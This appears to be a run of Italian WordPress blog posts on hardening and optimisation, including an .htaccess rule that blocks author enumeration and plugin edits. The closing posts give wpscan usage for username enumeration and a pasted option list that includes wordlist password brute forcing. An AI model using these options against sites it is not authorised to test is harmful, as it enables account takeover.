www.parrotsec.org

Vi segnalo anche: Frozenbox è un network italiano dedicato alla Hacking, Sicurezza informatica e programmazione.

www.frozenbox.org

Nella versione Full ci sono un numero abnorme di tool pronti all’uso, oltre a Anonsurf, penmode e programmi di crypting.
Non resta che scaricare la ISO!

Wordpress nascondere lista utenti da wpscan --enumarate u

Una delle cose più importanti e verificare con wpscan e altri scanner la propria venerabilità del vostro Wordpress installato onde evitare spiacevoli sorprese.

Come ben sappiamo con questo comando su wpscan:

wpscan --url www.nome-sito.com --enumarate u

Possiamo visualizzare tutti gli username del nostro wordpress, cosa non molto gradita, visto che potremmo tentare delle intrusioni...  o peggio dei brutal attack password!

Per evitare questa vulnerabilità basta inserire due regole di Rewrite scritte nel file .htacess all’interno della root directory del sito wordpress:

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteBase /
# block user enumeration
RewriteCond %{QUERY_STRING} (^|&)author=
RewriteRule . http://%{SERVER_NAME}/? [L]

</IfModule>

Salva

qTranslate X // togliere script inutili all'interno dell'head di Wordpress

qTranslate X è un plugin che ci permette diabilitare il multilingua a scelta su Wordpress con molta facilità.
Di recente è stato riesumato e reso compatibile con Yoast SEO con implementazioni per renderelo sempre più compatibile con le nuove versioni di Wordpress.

Di contro è un plugin che consuma molte risorse quindi Wordpress si deve ottimizzare al massimo, questo una conoscenza approffondita degli strumenti da usare (che vedremo più avanti).

E molto facile la castumizzazione via CSS, sia l'implementazione come widget, spesso però il plugin carica all'interno del nostro <head> righe di codice che non servono, almeno per alcune esigenze tecniche.

Vediamo ora come togliere appunto il CSS superfluo che carica all'interno dell' <head>.

Seguendo il percorso:
wp-content/plugins/qtranslate-x

Andiamo a modificare la pagina qtranslate_widget.php

Commentare:

if ( !defined( 'ABSPATH' ) ) exit;

define('QTX_WIDGET_CSS',
'.qtranxs_widget ul { margin: 0; }
.qtranxs_widget ul li
{
display: inline; /* horizontal list, use "list-item" or other appropriate value for vertical list */
list-style-type: none; /* use "initial" or other to enable bullets */
margin: 0 5px 0 0; /* adjust spacing between items */
opacity: 0.5;
-o-transition: 1s ease opacity;
-moz-transition: 1s ease opacity;
-webkit-transition: 1s ease opacity;
transition: 1s ease opacity;
}
/* .qtranxs_widget ul li span { margin: 0 5px 0 0; } */ /* other way to control spacing */
.qtranxs_widget ul li.active { opacity: 0.8; }
.qtranxs_widget ul li:hover { opacity: 1; }
.qtranxs_widget img { box-shadow: none; vertical-align: middle; display: initial; }
.qtranxs_flag { height:12px; width:18px; display:block; }
.qtranxs_flag_and_text { padding-left:20px; }
.qtranxs_flag span { display:none; }
');

dalla riga 42 alla 44 commentare queste righe:

Togliere il meta generator di qTranslate X

Inserire all'interno del propio functions.php (relativo al tema) questo script che toglierà all'interno dell'head il nostro meta tag

remove_action('wp_head','qtranxf_wp_head_meta_generator');

link qTranslate X

Salva

Salva

WebReaver Vulnerability Scanner, utile anche per Wordpress!

Un ottimo strumento per valutare le propie falle di sicurezza, sia nel propio Wordpress che in altri CMS e altro ancora.
WebReaver è molto semplice da usare adatto anche per principianti, elegante nel designe tutto in stile  Mac OS X.



WebReaver è stato progettato da zero come applicazione nativa X desktop di Mac OS, approfittando di tutte le prestazioni native e benefici visivi del più recente sistema operativo di Apple. In poche parole, WebReaver è il miglior strumento di test di sicurezza web per Mac Desktop.

L'unica "pecca" non è gratuito costa circa $29.99

questo il link ufficiale: www.webreaver.com

Yoast SEO plugin togliere commenti HTML WordPress

Spesso per ragioni di sicurezza abbiamo la necessità di nascondere e limitare i plugin di Wordpress;
Una prima soluzione è quella di disabilitare i commenti che vengono generati in questo caso di Yoast SEO.

<!-- This site is optimized with the Yoast SEO plugin v3.1.2 - https://yoast.com/wordpress/plugins/seo/ -->


- Andiamo a modificare il file class-frontend.php dentro la cartella plugin.

- nella riga 642 troveremo la stringa da modificare e la commenteremo fino alla riga 659 vedi esemio:

public function debug_marker( $echo = true ) {
		//$marker = sprintf(
			//'',
			/**
			 * Filter: 'wpseo_hide_version' - can be used to hide the Yoast SEO version in the debug marker (only available in Yoast SEO Premium)
			 *
			 * @api bool
			 */
			//( ( apply_filters( 'wpseo_hide_version', false ) && $this->is_premium() ) ? '' : ' v' . WPSEO_VERSION )
		//);

		//if ( $echo === false ) {
		//	return $marker;
		//}
		//else {
		//	echo "\n${marker}\n";
		//}
	}
 

Subito dopo andremo a commentare la riga 709:

(che fa riferimento a <!-- / Yoast SEO plugin. -->)
//echo '<!-- / ', $this->head_product_name(), ". -->\n\n";

Cosi toglieremo i commenti HTML nota bene una volta che aggiorni il plugin devi rifare la procedura.

 

Shopify lancia sul mercato Plugin per WordPress

Shopify ha annunciato oggi che lancerà sul mercato un nuovo plugin ufficiale per WordPress con a tre temi.
La società Canadese coglie solo l'8% della quota di mercato della tecnologia e-commerce, mentre i loro competitor WooCommerce (31%), Magento (19%), OpenCart (11%), Prestashop (10%), e altri (13%).

Ovviamante non srà gratuito, il costo srà di circa $9... 
Fonte (wptavern.com)

 

AngularJS for WordPress il plugin che consente di sfruttare tutta l'archittetura di Angular JS, HTML enhanced for web apps!

Non nuovo ma molto utile il plugin AngularJS per WordPress consente di sfruttare facilmente la potenza di AngularJS.
questo il link:wordpress.org/plugins/angularjs-for-wp/developers/

AngularJS è un framework JavaScript per lo sviluppo di applicazioni Web client side, la sua importanza non da poco è che sia supportato da Google questo basta a fare la differenza.

Link: https://angularjs.org/ HTML enhanced for web apps!

 

W3 Total Cache compressione Gzip per dare velocità al propio Wordpress

Per ottimizzare il nostro Wordpress ci viene in contro un plugin gratuito (prevede anche la Pro) molto efficace.
Potete scaricare il plugin dal sito ufficiale.
La particolarità è che ci permette di usare la compressione Gzip senza interagire direttamante manualmente nel file  .htaccess e non solo...

Importante:
Per funzionare correttamente, e solo per la prima configurazione, W3 Total Cache necessità di poter scrivere su alcuni file e cartelle della vostra installazione WordPress. È necessario quindi assicurarsi che siano scrivibili, ovvero le cartelle con permessi a 755 e i file a 644, in particolare la cartella wp-content e l file wp-config.php (questo che per motivi di sicurezza spesso si rende non scrivibile appunto)Andrà ad aggiungere  questa riga:

define('WP_CACHE', true) 

In seguito parleremo della giusta configurazione.

Salva

Come rendere invisibili le nostre email con jQuery

Abbiamo sempre più la neccessità di nascondere la nostra email da eventuali spam o frodi informatiche.
Questa potrebbe essere una soluzione:  (adattabile anche all'interno del nostro wordpress)

Questo e il nostro codice html:

<a href="mailto:me@mysite.com"&gtme@mysite.com</a>

Adesso andremo a lavorare con JQuery:

<a href="#"> <span id="my-email">please enable javascript to view</span></a>

a seguire il nostro script:

$('#my-email').html(function(){
	var e = "me";
	var a = "@";
	var d = "mysite";
	var c = ".com";
	var h = 'mailto:' + e + a + d + c;
	$(this).parent('a').attr('href', h);
	return e + a + d + c;
});

Implementare widget per WordPress

Implemetare widget non nativi per WordPress spesso e fondamantale per creare e gestire contenuti dinamici.
Nel nostro caso creeremo il nostro widget.

 Per prima cosa andremo a modificare il file:   themes > il tuo tema > functions.php
Andremo a inserire il codice dentro:

function widgets_init() {

register_sidebar( array(
'name' => esc_html__( 'Titlo che sarà visibile dentro l'area WP' ),
'id' => 'titolo_applicativo',
'description' => 'descrizione',
'before_widget' => '<div id="%1$s">',
'after_widget' => '</div>',
'before_title' => '<h3>',
'after_title' => '</h3>',
) );

Questo codice ci servira a definire il widget, dentro il pannello di controllo di Worpress. (esempio)

Adesso dobbiamo richiamere il widget all'interno dei template oppure dentro i vari partials, dipende dalle vostre esigenze per rendere tuto sempolice provate all'interno del footer.php (esempio)

Adesso allinteno del nostro file footer.php inseriremmo questo codice:

  <?php if ( ! is_active_sidebar( 'titolo_applicativo' ) ) { return;}?>
   <?php dynamic_sidebar( 'titolo_applicativo' ); ?>

Cosi richiamerete il widgets nella pagina.

 

kali linux brute force wordpress login Using wpscan.

WPScan è un tool reperibile online che permette a chi lo utilizza di ricavare diverse informazioni sull’ installazione wordpress che si andrà a scansionare. Lo script può essere utile sia all’ amministratore del sito che cerca una maggiore sicurezza, sia al malintenzionato che tenta di trovare un punto di accesso all’installazione.

TinyPNG Compressione PNG

Comprimere immagini PNG online gratuitamente, Ottimizzare le immagini con un perfetto equilibrio in termini di qualità e dimensione del file.

Compressione lossy avanzato per immagini PNG che conserva piena trasparenza alfa.
LINK:tinypng.com

Cosa fa TinyPNG fare?
TinyPNG utilizza tecniche di compressione con perdita di dati intelligenti per ridurre le dimensioni del file dei file PNG. Con selettivamente diminuendo il numero di colori nell'immagine, meno byte sono necessari per memorizzare i dati. L'effetto è quasi invisibile ma fa una grande differenza nella dimensione del file!

Perché dovrei usare TinyPNG?
PNG è utile perché è l'unico formato ampiamente supportato che può memorizzare parzialmente immagini trasparenti . Il formato utilizza la compressione, ma i file possono ancora essere di grandi dimensioni. Utilizzare TinyPNG per ridurre le immagini per le applicazioni e siti. Userà meno larghezza di banda e caricare più velocemente

 

Photoshop Plugin
compressione delle immagini appena ricevuto molto più semplice

Salvare le compresse JPEG e PNG immagini direttamente da Photoshop. Installare il plugin e sarete pronti ad andare. Una nuova opzione di menu apparirà in Photoshop da dove si può ridimensionare, anteprima, selezionare una cartella e salvare le immagini.

Link: Plugin per photoshop

 

 

WPScan è un web scanner

WPScan è un web scanner dedicato creato per analizzare e cercare falle di sicurezza all’interno della piattaforma di blogging WordPress, non è complesso ma molto efficace.

WPScan è sviluppato principalmente per piattaforme Linux (Kalilinux) ma è possibile sfruttarlo anche su macchine con sistema Mac OS X e Windows.

Lo strumento WPScan contiene un database e degli algoritmi particolari che permettono di eseguire delle azioni di enumerazione, controlli di vulnerabilità conosciute, attacchi su password a dizionario, etc, etc. Possiamo lanciare l’analisi di questo strumento verso un nostro sito di test o anche di produzione per verificare tutte le informazioni che un programma di scansione può ottenere e quindi reagire di conseguenza.

Un piccolo esemipo descrittivo dei comandi:

--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"

--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <String> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--max-threads <max-threads> Maximum Threads.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and

Visitate il sito ufficiale:

http://wpscan.org/